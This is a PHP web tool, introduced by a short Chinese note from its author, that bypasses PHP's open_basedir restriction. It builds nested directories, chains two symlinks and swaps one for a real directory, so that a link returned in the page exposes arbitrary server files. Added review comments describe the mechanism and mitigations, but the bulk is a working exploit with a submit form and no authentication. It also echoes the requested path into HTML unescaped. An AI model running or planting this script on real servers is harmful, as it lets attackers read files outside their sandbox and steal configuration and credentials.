在了解symlink() bypass open_basedir 的原理后,自己写的代码。在kali-Linux 上测试通过,Windows在路径的处理上需要修改一下。
<?php
/*
title: bypass open_basedir
auth: eT48
blog:http://blog.csdn.net/et48_sec
*/
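// Declare the response as UTF-8 HTML. The original sent a header named
// "Conten-type" with "charset:udf-8", which is not a valid Content-Type header.
header("Content-Type: text/html; charset=utf-8");
// NOTE(review): this silences every PHP error for the rest of the request, so
// failed mkdir()/chdir()/symlink() calls further down leave no trace in the
// PHP error log.
error_reporting(0);
// Discard cached stat() results before the filesystem work that follows.
clearstatcache();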
/**
 * Return a 6-character name made of distinct characters from A-Z and 0-9.
 *
 * The value is only used to name scratch directories and links. shuffle() is
 * not a cryptographic source, so the result must not be treated as a secret.
 *
 * @return string
 */
function randStr(){
    $alphabet = str_split('ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789');
    shuffle($alphabet);
    // Keep the first six characters of the shuffled alphabet.
    return implode(array_slice($alphabet, 0, 6));
}
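/**
 * Recursively delete a directory and everything beneath it.
 *
 * Symbolic links are removed as links and never followed. is_dir() resolves
 * links, so without the is_link() test a link to a directory elsewhere would
 * have that directory's contents deleted as well.
 *
 * @param string $dir Directory to remove.
 * @return bool True when $dir itself was removed, false otherwise.
 */
function delTree($dir){
    $entries = scandir($dir);
    if ($entries === false) {
        // Missing or unreadable directory: there is nothing to walk.
        return false;
    }
    foreach (array_diff($entries, array('.', '..')) as $file) {
        $target = "$dir/$file";
        if (!is_link($target) && is_dir($target)) {
            delTree($target);
        } else {
            // Regular files and symlinks (whatever they point at) are unlinked.
            unlink($target);
        }
    }
    return rmdir($dir);
}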
/**
 * Placeholder with an empty body: it does nothing and returns null.
 * No call to it appears in this listing.
 *
 * @param mixed $filename Unused.
 */
function check($filename)
{
}
/**
 * Create a symlink in the current working directory whose target string ends
 * in $path, and return an HTML anchor pointing at that symlink.
 *
 * What the statements below do, in order:
 *   1. build a scratch tree that mirrors $path's components;
 *   2. build a chain of nested directories inside it, one level deeper than
 *      the number of '/' characters in the working directory;
 *   3. create link A to the deepest directory, then link B with the target
 *      "A" + "/.." repeated + $path;
 *   4. replace link A with a plain directory of the same name and delete the
 *      scratch tree.
 * NOTE(review): the apparent intent is that B's target resolves inside the
 * scratch tree while A is still a link, and to the real $path once A has been
 * replaced. Confirm against the PHP version under test.
 *
 * Defender notes:
 *   - Artefacts left in the working directory: one directory and one symlink,
 *     each with a random 6-character [A-Z0-9] name from randStr().
 *   - PHP does not read the target here. The returned link is presumably
 *     fetched through the web server, so the read depends on the server
 *     following symlinks (verify for the deployment).
 *   - open_basedir should not be the only containment. Listing symlink in
 *     disable_functions removes the calls this function relies on, disabling
 *     symlink following in the web server removes the fetch, and OS-level
 *     isolation of the PHP process limits what can be reached.
 *   - $path is copied into the returned HTML without escaping.
 *   - No return value is checked; the caller has already set error_reporting(0).
 *
 * @param string $path Path taken from the request, split on DIRECTORY_SEPARATOR.
 * @return string HTML anchor to the created symlink, followed by <br>.
 */
function bypassdir($path){
// Component 0 is skipped by the loops below (it is empty when $path starts with the separator).
$paths = explode(DIRECTORY_SEPARATOR,$path);
$cwd = getcwd();
// Number of '/' characters in the working directory. Only '/' is counted, not DIRECTORY_SEPARATOR.
$num = preg_match_all('/\//',$cwd);
$tempfn = randStr();
$tempdir = "";
$expstr = "";
$templink = randStr();
$explink = randStr();
$res = "";
// Step 1: scratch directory, then one nested directory per component of $path.
mkdir($tempfn);
chdir($tempfn);
for($i=1; $i<count($paths); $i++){
mkdir($paths[$i]);
chdir($paths[$i]);
}
// Return to the scratch directory.
for($i=1; $i<count($paths); $i++){
chdir("..");
}
// Step 2: $num+1 nested directories, all named $tempfn.
for($i=1; $i<=$num+1; $i++){
mkdir($tempfn);
chdir($tempfn);
}
// Absolute path of the deepest nested directory.
$tempdir = getcwd();
// Back to the original working directory: $num+1 nested levels plus the scratch directory itself.
for($i=1; $i<=$num+2; $i++){
chdir("..");
}
// "/.." repeated $num+1 times.
for($i=1; $i<=$num+1; $i++){
$expstr .="/..";
}
// Step 3: link A ($templink) and link B ($explink); B's target is a relative path through A.
symlink($tempdir,$templink);
symlink($templink.$expstr.$path,$explink);
// Step 4: swap link A for a real directory with the same name, then remove the scratch tree.
unlink($templink);
mkdir($templink);
delTree($tempfn);
// NOTE(review): $path is concatenated into the markup unescaped.
$res = "<a target='_blank' href='./".$explink."'>".$path."</a><br>";
return $res;
}
// Request handler: a non-empty POST field "path" is handed to bypassdir()
// exactly as received, the resulting HTML fragment is printed, and the script
// stops so the page below is not rendered.
// NOTE(review): no authentication or allow-list check is visible before the
// filesystem operations run.
$res = "";
if (!empty($_POST['path'])) {
    $res = bypassdir($_POST['path']);
    echo $res;
    exit();
}
?>
<html>
<head><title>open_basedir</title></head>
<body>
Title: bypass open_basedir<br>Auth: eT48<br> Blog: http://blog.csdn.net/et48_sec<br>Open_basedir: <?php echo ini_get('open_basedir'); ?><br>PHPVersion: <?php echo "PHP ".phpversion();?><br><br>
<form method='post'>path <input id='path' type='text' style='width:450px'><input type='button' οnclick='bypassdir()' value='submit' ></form>
<div id='output'></div>
<!-- NOTE(review): this script comes from a third-party host over plain HTTP and has no integrity attribute, so that host, or anyone on the network path, controls the code that runs in this page. -->
<script src="http://www.w3school.com.cn/jquery/jquery-1.11.1.min.js"></script>
<script>
// The PHP tag below contains an expression but no echo, so it emits nothing and
// targeturl is the empty string. send_post() passes that value to $.ajax as the url.
var targeturl = '<?php $_SERVER["REQUEST_URI"] ?>';
// POST targetdata to targeturl and pass the text response to callback.
// Request failures are ignored: the error handler is empty.
function send_post(targetdata, callback) {
    $.ajax({
        url: targeturl,
        type: 'POST',
        data: targetdata,
        dataType: 'text',
        success: function (res) {
            callback(res);
        },
        error: function () {}
    });
}
// Read the #path input and, unless it is empty, POST it and append the reply
// to #output. append() inserts the reply as HTML rather than as text.
function bypassdir() {
    // Assigned without var/let, so `path` becomes an implicit global.
    path = $('#path').val();
    if (path == '') {
        return;
    }
    send_post({ path: path }, function (res) {
        $('#output').append(res);
    });
}
</script>
</body>
</html>
<?php /* Terminate the script once the page has been emitted. */ die();?>